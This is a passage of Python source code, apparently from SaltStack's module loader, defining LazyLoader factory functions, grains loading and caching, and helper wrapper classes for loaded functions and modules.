return dict(loader._dict) # return a copy of *just* the funcs for `name`
def metaproxy(opts, loaded_base_name=None):
"""
Return functions used in the meta proxy
"""
return LazyLoader(
_module_dirs(opts, "metaproxy"),
opts,
tag="metaproxy",
loaded_base_name=loaded_base_name,
)
def matchers(opts):
"""
Return the matcher services plugins
"""
return LazyLoader(_module_dirs(opts, "matchers"), opts, tag="matchers")
def engines(opts, functions, runners, utils, proxy=None):
"""
Return the master services plugins
"""
pack = {
"__salt__": functions,
"__runners__": runners,
"__proxy__": proxy,
"__utils__": utils,
}
return LazyLoader(
_module_dirs(opts, "engines"),
opts,
tag="engines",
pack=pack,
extra_module_dirs=utils.module_dirs if utils else None,
)
def proxy(
opts,
functions=None,
returners=None,
whitelist=None,
utils=None,
context=None,
pack_self="__proxy__",
):
"""
Returns the proxy module for this salt-proxy-minion
"""
return LazyLoader(
_module_dirs(opts, "proxy"),
opts,
tag="proxy",
pack={
"__salt__": functions,
"__ret__": returners,
"__utils__": utils,
"__context__": context,
},
extra_module_dirs=utils.module_dirs if utils else None,
pack_self=pack_self,
)
def returners(opts, functions, whitelist=None, context=None, proxy=None):
"""
Returns the returner modules
"""
return LazyLoader(
_module_dirs(opts, "returners", "returner"),
opts,
tag="returner",
whitelist=whitelist,
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy or {}},
)
def utils(opts, whitelist=None, context=None, proxy=proxy, pack_self=None):
"""
Returns the utility modules
"""
return LazyLoader(
_module_dirs(opts, "utils", ext_type_dirs="utils_dirs"),
opts,
tag="utils",
whitelist=whitelist,
pack={"__context__": context, "__proxy__": proxy or {}},
pack_self=pack_self,
)
def pillars(opts, functions, context=None):
"""
Returns the pillars modules
"""
_utils = utils(opts)
ret = LazyLoader(
_module_dirs(opts, "pillar"),
opts,
tag="pillar",
pack={"__salt__": functions, "__context__": context, "__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
pack_self="__ext_pillar__",
)
return FilterDictWrapper(ret, ".ext_pillar")
def tops(opts):
"""
Returns the tops modules
"""
if "master_tops" not in opts:
return {}
whitelist = list(opts["master_tops"].keys())
ret = LazyLoader(
_module_dirs(opts, "tops", "top"), opts, tag="top", whitelist=whitelist,
)
return FilterDictWrapper(ret, ".top")
def wheels(opts, whitelist=None, context=None):
"""
Returns the wheels modules
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "wheel"),
opts,
tag="wheel",
whitelist=whitelist,
pack={"__context__": context},
)
def outputters(opts):
"""
Returns the outputters modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only outputters present in the keyspace
"""
ret = LazyLoader(
_module_dirs(opts, "output", ext_type_dirs="outputter_dirs"),
opts,
tag="output",
)
wrapped_ret = FilterDictWrapper(ret, ".output")
# TODO: this name seems terrible... __salt__ should always be execution mods
ret.pack["__salt__"] = wrapped_ret
return wrapped_ret
def serializers(opts):
"""
Returns the serializers modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only serializers present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "serializers"), opts, tag="serializers",)
def eauth_tokens(opts):
"""
Returns the tokens modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only token backends present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "tokens"), opts, tag="tokens",)
def auth(opts, whitelist=None):
"""
Returns the auth modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader
"""
return LazyLoader(
_module_dirs(opts, "auth"),
opts,
tag="auth",
whitelist=whitelist,
pack={"__salt__": minion_mods(opts)},
)
def fileserver(opts, backends):
"""
Returns the file server modules
"""
_utils = utils(opts)
if backends is not None:
if not isinstance(backends, list):
backends = [backends]
# Make sure that the VCS backends work either with git or gitfs, hg or
# hgfs, etc.
vcs_re = re.compile("^(git|svn|hg)")
fs_re = re.compile("fs$")
vcs = []
non_vcs = []
for back in [fs_re.sub("", x) for x in backends]:
if vcs_re.match(back):
vcs.extend((back, back + "fs"))
else:
non_vcs.append(back)
backends = vcs + non_vcs
return LazyLoader(
_module_dirs(opts, "fileserver"),
opts,
tag="fileserver",
whitelist=backends,
pack={"__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
)
def roster(opts, runner=None, utils=None, whitelist=None):
"""
Returns the roster modules
"""
return LazyLoader(
_module_dirs(opts, "roster"),
opts,
tag="roster",
whitelist=whitelist,
pack={"__runner__": runner, "__utils__": utils},
extra_module_dirs=utils.module_dirs if utils else None,
)
def thorium(opts, functions, runners):
"""
Load the thorium runtime modules
"""
pack = {"__salt__": functions, "__runner__": runners, "__context__": {}}
ret = LazyLoader(_module_dirs(opts, "thorium"), opts, tag="thorium", pack=pack)
ret.pack["__thorium__"] = ret
return ret
def states(
opts, functions, utils, serializers, whitelist=None, proxy=None, context=None
):
"""
Returns the state modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
statemods = salt.loader.states(__opts__, None, None)
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "states"),
opts,
tag="states",
pack={
"__salt__": functions,
"__proxy__": proxy or {},
"__utils__": utils,
"__serializers__": serializers,
"__context__": context,
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__states__",
)
def beacons(opts, functions, context=None, proxy=None):
"""
Load the beacon modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
"""
return LazyLoader(
_module_dirs(opts, "beacons"),
opts,
tag="beacons",
pack={"__context__": context, "__salt__": functions, "__proxy__": proxy or {}},
virtual_funcs=[],
)
def log_handlers(opts):
"""
Returns the custom logging handler modules
:param dict opts: The Salt options dictionary
"""
ret = LazyLoader(
_module_dirs(
opts,
"log_handlers",
int_type="handlers",
base_path=os.path.join(SALT_BASE_PATH, "log"),
),
opts,
tag="log_handlers",
)
return FilterDictWrapper(ret, ".setup_handlers")
def ssh_wrapper(opts, functions=None, context=None):
"""
    Returns the custom salt-ssh wrapper modules
"""
return LazyLoader(
_module_dirs(
opts,
"wrapper",
base_path=os.path.join(SALT_BASE_PATH, os.path.join("client", "ssh")),
),
opts,
tag="wrapper",
pack={
"__salt__": functions,
# "__grains__": opts.get("grains", {}),
# "__pillar__": opts.get("pillar", {}),
"__context__": context,
},
)
def render(opts, functions, states=None, proxy=None, context=None):
"""
Returns the render modules
"""
if context is None:
context = {}
pack = {
"__salt__": functions,
"__grains__": opts.get("grains", {}),
"__context__": context,
}
if states:
pack["__states__"] = states
if proxy is None:
proxy = {}
pack["__proxy__"] = proxy
ret = LazyLoader(
_module_dirs(opts, "renderers", "render", ext_type_dirs="render_dirs",),
opts,
tag="render",
pack=pack,
)
rend = FilterDictWrapper(ret, ".render")
if not check_render_pipe_str(
opts["renderer"], rend, opts["renderer_blacklist"], opts["renderer_whitelist"]
):
err = (
"The renderer {} is unavailable, this error is often because "
"the needed software is unavailable".format(opts["renderer"])
)
log.critical(err)
raise LoaderError(err)
return rend
def grain_funcs(opts, proxy=None, context=None):
"""
Returns the grain functions
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
grainfuncs = salt.loader.grain_funcs(__opts__)
"""
_utils = utils(opts, proxy=proxy)
pack = {"__utils__": utils(opts, proxy=proxy), "__context__": context}
ret = LazyLoader(
_module_dirs(opts, "grains", "grain", ext_type_dirs="grains_dirs",),
opts,
tag="grains",
extra_module_dirs=_utils.module_dirs,
pack=pack,
)
ret.pack["__utils__"] = _utils
return ret
def _format_cached_grains(cached_grains):
"""
Returns cached grains with fixed types, like tuples.
"""
if cached_grains.get("osrelease_info"):
osrelease_info = cached_grains["osrelease_info"]
if isinstance(osrelease_info, list):
cached_grains["osrelease_info"] = tuple(osrelease_info)
return cached_grains
def _load_cached_grains(opts, cfn):
"""
Returns the grains cached in cfn, or None if the cache is too old or is
corrupted.
"""
if not os.path.isfile(cfn):
log.debug("Grains cache file does not exist.")
return None
grains_cache_age = int(time.time() - os.path.getmtime(cfn))
if grains_cache_age > opts.get("grains_cache_expiration", 300):
log.debug(
"Grains cache last modified %s seconds ago and cache "
"expiration is set to %s. Grains cache expired. "
"Refreshing.",
grains_cache_age,
opts.get("grains_cache_expiration", 300),
)
return None
if opts.get("refresh_grains_cache", False):
log.debug("refresh_grains_cache requested, Refreshing.")
return None
log.debug("Retrieving grains from cache")
try:
serial = salt.payload.Serial(opts)
with salt.utils.files.fopen(cfn, "rb") as fp_:
cached_grains = salt.utils.data.decode(
serial.load(fp_), preserve_tuples=True
)
if not cached_grains:
log.debug("Cached grains are empty, cache might be corrupted. Refreshing.")
return None
return _format_cached_grains(cached_grains)
except OSError:
return None
def grains(opts, force_refresh=False, proxy=None, context=None):
"""
Return the functions for the dynamic grains and the values for the static
grains.
Since grains are computed early in the startup process, grains functions
do not have __salt__ or __proxy__ available. At proxy-minion startup,
this function is called with the proxymodule LazyLoader object so grains
functions can communicate with their controlled device.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
print __grains__['id']
"""
# Need to re-import salt.config, somehow it got lost when a minion is starting
import salt.config
# if we have no grains, lets try loading from disk (TODO: move to decorator?)
cfn = os.path.join(opts["cachedir"], "grains.cache.p")
if not force_refresh and opts.get("grains_cache", False):
cached_grains = _load_cached_grains(opts, cfn)
if cached_grains:
return cached_grains
else:
log.debug("Grains refresh requested. Refreshing grains.")
if opts.get("skip_grains", False):
return {}
grains_deep_merge = opts.get("grains_deep_merge", False) is True
if "conf_file" in opts:
pre_opts = {}
pre_opts.update(
salt.config.load_config(
opts["conf_file"],
"SALT_MINION_CONFIG",
salt.config.DEFAULT_MINION_OPTS["conf_file"],
)
)
default_include = pre_opts.get("default_include", opts["default_include"])
include = pre_opts.get("include", [])
pre_opts.update(
salt.config.include_config(
default_include, opts["conf_file"], verbose=False
)
)
pre_opts.update(
salt.config.include_config(include, opts["conf_file"], verbose=True)
)
if "grains" in pre_opts:
opts["grains"] = pre_opts["grains"]
else:
opts["grains"] = {}
else:
opts["grains"] = {}
grains_data = {}
blist = opts.get("grains_blacklist", [])
funcs = grain_funcs(opts, proxy=proxy, context=context or {})
if force_refresh: # if we refresh, lets reload grain modules
funcs.clear()
# Run core grains
for key in funcs:
if not key.startswith("core."):
continue
log.trace("Loading %s grain", key)
ret = funcs[key]()
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
# Run the rest of the grains
for key in funcs:
if key.startswith("core.") or key == "_errors":
continue
try:
# Grains are loaded too early to take advantage of the injected
# __proxy__ variable. Pass an instance of that LazyLoader
# here instead to grains functions if the grains functions take
# one parameter. Then the grains can have access to the
# proxymodule for retrieving information from the connected
# device.
log.trace("Loading %s grain", key)
parameters = salt.utils.args.get_function_argspec(funcs[key]).args
kwargs = {}
if "proxy" in parameters:
kwargs["proxy"] = proxy
if "grains" in parameters:
kwargs["grains"] = grains_data
ret = funcs[key](**kwargs)
except Exception: # pylint: disable=broad-except
if salt.utils.platform.is_proxy():
log.info(
"The following CRITICAL message may not be an error; the proxy may not be completely established yet."
)
log.critical(
"Failed to load grains defined in grain file %s in "
"function %s, error:\n",
key,
funcs[key],
exc_info=True,
)
continue
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
if opts.get("proxy_merge_grains_in_module", True) and proxy:
try:
proxytype = proxy.opts["proxy"]["proxytype"]
if proxytype + ".grains" in proxy:
if (
proxytype + ".initialized" in proxy
and proxy[proxytype + ".initialized"]()
):
try:
proxytype = proxy.opts["proxy"]["proxytype"]
ret = proxy[proxytype + ".grains"]()
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
except Exception: # pylint: disable=broad-except
log.critical(
"Failed to run proxy's grains function!", exc_info=True
)
except KeyError:
pass
grains_data.update(opts["grains"])
# Write cache if enabled
if opts.get("grains_cache", False):
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Late import
import salt.modules.cmdmod
# Make sure cache file isn't read-only
salt.modules.cmdmod._run_quiet('attrib -R "{}"'.format(cfn))
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
serial = salt.payload.Serial(opts)
serial.dump(grains_data, fp_)
except TypeError as e:
log.error("Failed to serialize grains cache: %s", e)
raise # re-throw for cleanup
except Exception as e: # pylint: disable=broad-except
log.error("Unable to write to grains cache file %s: %s", cfn, e)
# Based on the original exception, the file may or may not have been
# created. If it was, we will remove it now, as the exception means
# the serialized data is not to be trusted, no matter what the
# exception is.
if os.path.isfile(cfn):
os.unlink(cfn)
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, opts["grains"])
else:
grains_data.update(opts["grains"])
return salt.utils.data.decode(grains_data, preserve_tuples=True)
# TODO: get rid of? Does anyone use this? You should use raw() instead
def call(fun, **kwargs):
"""
Directly call a function inside a loader directory
"""
args = kwargs.get("args", [])
dirs = kwargs.get("dirs", [])
funcs = LazyLoader(
[os.path.join(SALT_BASE_PATH, "modules")] + dirs,
None,
tag="modules",
virtual_enable=False,
)
return funcs[fun](*args)
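# Usage sketch for call() (illustrative; assumes salt's shipped 'test'
# execution module is available on disk):
#
#   result = call("test.ping")                 # -> True
#   result = call("test.echo", args=["hi"])    # -> "hi"
#   # extra search directories may be passed via dirs=[...]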
def runner(opts, utils=None, context=None, whitelist=None):
"""
    Returns the runner modules
"""
if utils is None:
utils = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "runners", "runner", ext_type_dirs="runner_dirs"),
opts,
tag="runners",
pack={"__utils__": utils, "__context__": context},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
# TODO: change from __salt__ to something else, we overload __salt__ too much
pack_self="__salt__",
)
def queues(opts):
"""
    Returns the queue modules
"""
return LazyLoader(
_module_dirs(opts, "queues", "queue", ext_type_dirs="queue_dirs"),
opts,
tag="queues",
)
def sdb(opts, functions=None, whitelist=None, utils=None):
"""
Make a very small database call
"""
if utils is None:
utils = {}
return LazyLoader(
_module_dirs(opts, "sdb"),
opts,
tag="sdb",
pack={
"__sdb__": functions,
"__utils__": utils,
"__salt__": minion_mods(opts, utils=utils),
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
)
def pkgdb(opts):
"""
Return modules for SPM's package database
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgdb", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgdb",
)
def pkgfiles(opts):
"""
Return modules for SPM's file handling
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgfiles", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgfiles",
)
def clouds(opts):
"""
Return the cloud functions
"""
_utils = salt.loader.utils(opts)
# Let's bring __active_provider_name__, defaulting to None, to all cloud
# drivers. This will get temporarily updated/overridden with a context
# manager when needed.
functions = LazyLoader(
_module_dirs(
opts,
"clouds",
"cloud",
base_path=os.path.join(SALT_BASE_PATH, "cloud"),
int_type="clouds",
),
opts,
tag="clouds",
pack={"__utils__": _utils, "__active_provider_name__": None},
extra_module_dirs=_utils.module_dirs,
)
for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:
log.trace(
"'%s' has been marked as not supported. Removing from the "
"list of supported cloud functions",
funcname,
)
functions.pop(funcname, None)
return functions
def netapi(opts):
"""
Return the network api functions
"""
return LazyLoader(_module_dirs(opts, "netapi"), opts, tag="netapi",)
def executors(opts, functions=None, context=None, proxy=None):
"""
Returns the executor modules
"""
if proxy is None:
proxy = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "executors", "executor"),
opts,
tag="executor",
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy},
pack_self="__executors__",
)
def cache(opts, serial):
"""
    Returns the cache modules
"""
return LazyLoader(
_module_dirs(opts, "cache", "cache"),
opts,
tag="cache",
pack={"__context__": {"serial": serial}},
)
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {} parent module'''".format(name.split(".")[-1])
# ModuleType can't accept a unicode type on PY2
module = types.ModuleType(str(name)) # future lint: disable=blacklisted-function
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(SALT_BASE_PATH):
return "int"
return "ext"
# TODO: move somewhere else?
class FilterDictWrapper(MutableMapping):
"""
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
"""
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, "")
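# Usage sketch for FilterDictWrapper (illustrative only, with a plain dict
# standing in for a LazyLoader):
#
#   funcs = {"jinja.render": lambda: "rendered", "yaml.render": lambda: "data"}
#   rend = FilterDictWrapper(funcs, ".render")
#   rend["jinja"]()   # looks up funcs["jinja.render"]
#   list(rend)        # -> ["jinja", "yaml"]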
class LoadedFunc:
"""
The functions loaded by LazyLoader instances using subscript notation
'a[k]' will be wrapped with LoadedFunc.
- Makes sure functions are called with the correct loader's context.
- Provides access to a wrapped func's __global__ attribute
:param func callable: The callable to wrap.
:param dict loader: The loader to use in the context when the wrapped callable is called.
"""
def __init__(self, func, loader):
self.func = func
self.loader = loader
functools.update_wrapper(self, func)
def __getattr__(self, name):
return getattr(self.func, name)
def __call__(self, *args, **kwargs):
if self.loader.inject_globals:
run_func = global_injector_decorator(self.loader.inject_globals)(self.func)
else:
run_func = self.func
return self.loader.run(run_func, *args, **kwargs)
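# Illustration (not part of the original source): subscripting a LazyLoader,
# e.g. loader["test.ping"], returns LoadedFunc(func, loader); calling the
# wrapper executes the underlying function via loader.run(), inside the
# loader's contextvars context and with any inject_globals applied.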
class LoadedMod:
def __init__(self, mod, loader):
"""
Return the wrapped func's globals via this object's __globals__
attribute.
"""
self.mod = mod
self.loader = loader
def __getattr__(self, name):
"""
Run the wrapped function in the loader's context.
"""
attr = getattr(self.mod, name)
if inspect.isfunction(attr) or inspect.ismethod(attr):
return LoadedFunc(attr, self.loader)
return attr
class LazyLoader(salt.utils.lazy.LazyDict):
"""
    A pseudo-dictionary which has a set of keys which are the
name of the module and function, delimited by a dot. When
the value of the key is accessed, the function is then loaded
from disk and into memory.
.. note::
Iterating over keys will cause all modules to be loaded.
:param list module_dirs: A list of directories on disk to search for modules
:param dict opts: The salt options dictionary.
:param str tag: The tag for the type of module to load
:param func mod_type_check: A function which can be used to verify files
    :param dict pack: A dictionary of functions to be packed into modules as they are loaded
:param list whitelist: A list of modules to whitelist
:param bool virtual_enable: Whether or not to respect the __virtual__ function when loading modules.
    :param list virtual_funcs: The names of additional functions in the module to call to verify its functionality.
        If any of these does not return a true value, the module will not load.
    :param list extra_module_dirs: A list of directories that loaded modules will be able to import from
:param str pack_self: Pack this module into a variable by this name into modules loaded
:returns: A LazyLoader object which functions as a dictionary. Keys are 'module.function' and values
are function references themselves which are loaded on-demand.
# TODO:
- move modules_max_memory into here
- singletons (per tag)
"""
mod_dict_class = salt.utils.odict.OrderedDict
def __init__(
self,
module_dirs,
opts=None,
tag="module",
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
static_modules=None,
proxy=None,
virtual_funcs=None,
extra_module_dirs=None,
pack_self=None,
): # pylint: disable=W0231
"""
In pack, if any of the values are None they will be replaced with an
empty context-specific dict
"""
self.parent_loader = None
self.inject_globals = {}
self.pack = {} if pack is None else pack
for i in self.pack:
if isinstance(self.pack[i], salt.loader_context.NamedLoaderContext):
self.pack[i] = self.pack[i].value()
if opts is None:
opts = {}
threadsafety = not opts.get("multiprocessing")
self.context_dict = salt.utils.context.ContextDict(threadsafe=threadsafety)
self.opts = self.__prep_mod_opts(opts)
self.pack_self = pack_self
self.module_dirs = module_dirs
self.tag = tag
self._gc_finalizer = None
if loaded_base_name and loaded_base_name != LOADED_BASE_NAME:
self.loaded_base_name = loaded_base_name
else:
self.loaded_base_name = LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
if "__context__" not in self.pack:
self.pack["__context__"] = None
for k, v in self.pack.items():
if v is None: # if the value of a pack is None, lets make an empty dict
self.context_dict.setdefault(k, {})
self.pack[k] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, k
)
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.static_modules = static_modules if static_modules else []
if virtual_funcs is None:
virtual_funcs = []
self.virtual_funcs = virtual_funcs
self.extra_module_dirs = extra_module_dirs if extra_module_dirs else []
self._clean_module_dirs = []
self.disabled = set(
self.opts.get(
"disable_{}{}".format(self.tag, "" if self.tag[-1] == "s" else "s"), [],
)
)
# A map of suffix to description for imp
self.suffix_map = {}
# A list to determine precedence of extensions
# Prefer packages (directories) over modules (single files)!
self.suffix_order = [""]
for (suffix, mode, kind) in SUFFIXES:
self.suffix_map[suffix] = (suffix, mode, kind)
self.suffix_order.append(suffix)
self._lock = threading.RLock()
with self._lock:
self._refresh_file_mapping()
super().__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module("{}.int".format(self.loaded_base_name))
_generate_module("{}.int.{}".format(self.loaded_base_name, tag))
_generate_module("{}.ext".format(self.loaded_base_name))
_generate_module("{}.ext.{}".format(self.loaded_base_name, tag))
def clean_modules(self):
"""
Clean modules
"""
for name in list(sys.modules):
if name.startswith(self.loaded_base_name):
del sys.modules[name]
def __getitem__(self, item):
"""
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
"""
func = super().__getitem__(item)
return LoadedFunc(func, self)
def __getattr__(self, mod_name):
"""
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
"""
if mod_name in ("__getstate__", "__setstate__"):
return object.__getattribute__(self, mod_name)
# if we have an attribute named that, lets return it.
try:
return object.__getattr__(self, mod_name) # pylint: disable=no-member
except AttributeError:
pass
# otherwise we assume its jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return LoadedMod(self.loaded_modules[mod_name], self)
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
"""
Return the error string for a missing function.
        This can range from "not available" to "__virtual__ returned False".
"""
mod_name = function_name.split(".")[0]
if mod_name in self.loaded_modules:
return "'{}' is not available.".format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return "'{}' is not available.".format(function_name)
else:
if reason is not None:
return "'{}' __virtual__ returned False: {}".format(
mod_name, reason
)
else:
return "'{}' __virtual__ returned False".format(mod_name)
def _refresh_file_mapping(self):
"""
refresh the mapping of the FS on disk
"""
# map of suffix to description for imp
if (
self.opts.get("cython_enable", True) is True
and ".pyx" not in self.suffix_map
):
try:
global pyximport
pyximport = __import__("pyximport") # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map[".pyx"] = tuple()
if ".pyx" not in self.suffix_order:
self.suffix_order.append(".pyx")
except ImportError:
log.info(
"Cython is enabled in the options but not present "
"in the system path. Skipping Cython modules."
)
# Allow for zipimport of modules
if (
self.opts.get("enable_zip_modules", True) is True
and ".zip" not in self.suffix_map
):
self.suffix_map[".zip"] = tuple()
if ".zip" not in self.suffix_order:
self.suffix_order.append(".zip")
# allow for module dirs
self.suffix_map[""] = ("", "", MODULE_KIND_PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
# The files are added in order of priority, so order *must* be retained.
self.file_mapping = salt.utils.odict.OrderedDict()
opt_match = []
def _replace_pre_ext(obj):
"""
Hack so we can get the optimization level that we replaced (if
any) out of the re.sub call below. We use a list here because
it is a persistent data structure that we will be able to
access after re.sub is called.
"""
opt_match.append(obj)
return ""
for mod_dir in self.module_dirs:
try:
# Make sure we have a sorted listdir in order to have
# expectable override results
files = sorted(x for x in os.listdir(mod_dir) if x != "__pycache__")
except OSError:
continue # Next mod_dir
try:
pycache_files = [
os.path.join("__pycache__", x)
for x in sorted(os.listdir(os.path.join(mod_dir, "__pycache__")))
]
except OSError:
pass
else:
files.extend(pycache_files)
for filename in files:
try:
dirname, basename = os.path.split(filename)
if basename.startswith("_"):
# skip private modules
# log messages omitted for obviousness
continue # Next filename
f_noext, ext = os.path.splitext(basename)
f_noext = PY3_PRE_EXT.sub(_replace_pre_ext, f_noext)
try:
opt_level = int(opt_match.pop().group(1).rsplit("-", 1)[-1])
except (AttributeError, IndexError, ValueError):
# No regex match or no optimization level matched
opt_level = 0
try:
opt_index = self.opts["optimization_order"].index(opt_level)
                    except (KeyError, ValueError):
log.trace(
"Disallowed optimization level %d for module "
"name '%s', skipping. Add %d to the "
"'optimization_order' config option if you "
"do not want to ignore this optimization "
"level.",
opt_level,
f_noext,
opt_level,
)
continue
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue # Next filename
if f_noext in self.disabled:
log.trace(
"Skipping %s, it is disabled by configuration", filename
)
continue # Next filename
fpath = os.path.join(mod_dir, filename)
# if its a directory, lets allow us to load that
if ext == "":
# is there something __init__?
subfiles = os.listdir(fpath)
for suffix in self.suffix_order:
if "" == suffix:
continue # Next suffix (__init__ must have a suffix)
init_file = "__init__{}".format(suffix)
if init_file in subfiles:
break
else:
continue # Next filename
try:
curr_ext = self.file_mapping[f_noext][1]
curr_opt_index = self.file_mapping[f_noext][2]
except KeyError:
pass
else:
if "" in (curr_ext, ext) and curr_ext != ext:
log.error(
"Module/package collision: '%s' and '%s'",
fpath,
self.file_mapping[f_noext][0],
)
if six.PY3 and ext == ".pyc" and curr_ext == ".pyc":
# Check the optimization level
if opt_index >= curr_opt_index:
# Module name match, but a higher-priority
# optimization level was already matched, skipping.
continue
elif not curr_ext or self.suffix_order.index(
ext
) >= self.suffix_order.index(curr_ext):
                            # Match found but a higher-priority match already
# exists, so skip this.
continue
if six.PY3 and not dirname and ext == ".pyc":
# On Python 3, we should only load .pyc files from the
# __pycache__ subdirectory (i.e. when dirname is not an
# empty string).
continue
# Made it this far - add it
self.file_mapping[f_noext] = (fpath, ext, opt_index)
except OSError:
continue
for smod in self.static_modules:
f_noext = smod.split(".")[-1]
self.file_mapping[f_noext] = (smod, ".o", 0)
def clear(self):
"""
Clear the dict
"""
with self._lock:
super().clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, "opts"):
self._refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
"""
Strip out of the opts any logger instance
"""
if "__grains__" not in self.pack:
grains = opts.get("grains", {})
if isinstance(grains, salt.loader_context.NamedLoaderContext):
grains = grains.value()
self.context_dict["grains"] = grains
self.pack["__grains__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "grains"
)
if "__pillar__" not in self.pack:
pillar = opts.get("pillar", {})
if isinstance(pillar, salt.loader_context.NamedLoaderContext):
pillar = pillar.value()
self.context_dict["pillar"] = pillar
self.pack["__pillar__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "pillar"
)
mod_opts = {}
for key, val in list(opts.items()):
if key == "logger":
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
"""
Iterate over all file_mapping files in order of closeness to mod_name
"""
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
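    # Illustration (hypothetical file_mapping keys): for mod_name "test" and
    # keys ["test", "test_virtual", "cmd"], this yields "test" (exact match),
    # then every key containing "test" (here "test" again and "test_virtual"),
    # then the remaining keys ("cmd").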
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname)
for sname in dir(mod)
if isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + "."):
reload_module(submodule)
self._reload_submodules(submodule)
def __populate_sys_path(self):
for directory in self.extra_module_dirs:
if directory not in sys.path:
sys.path.append(directory)
self._clean_module_dirs.append(directory)
def __clean_sys_path(self):
invalidate_path_importer_cache = False
for directory in self._clean_module_dirs:
if directory in sys.path:
sys.path.remove(directory)
invalidate_path_importer_cache = True
self._clean_module_dirs = []
# Be sure that sys.path_importer_cache do not contains any
# invalid FileFinder references
importlib.invalidate_caches()
        # Because we are meddling with importlib, we can occasionally hit an
        # invalidation issue with sys.path_importer_cache that requires
        # removing FileFinder entries that remain None for the
        # extra_module_dirs
if invalidate_path_importer_cache:
for directory in self.extra_module_dirs:
if (
directory in sys.path_importer_cache
and sys.path_importer_cache[directory] is None
):
del sys.path_importer_cache[directory]
def _load_module(self, name):
mod = None
